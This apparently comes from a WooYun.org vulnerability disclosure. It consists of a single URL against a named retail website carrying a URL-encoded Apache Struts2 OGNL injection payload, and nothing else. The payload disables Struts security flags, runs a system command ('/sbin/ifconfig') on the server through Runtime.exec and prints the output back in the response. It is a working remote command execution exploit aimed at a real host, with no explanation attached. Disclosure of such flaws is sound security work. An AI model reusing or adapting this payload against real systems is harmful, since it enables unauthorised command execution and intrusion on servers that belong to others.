WooYun.org

http://www.secoo.com/shoppingCart/cart/shoppingCartAction_queryCart.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23kxlzx%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%29%2c%23kxlzx.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]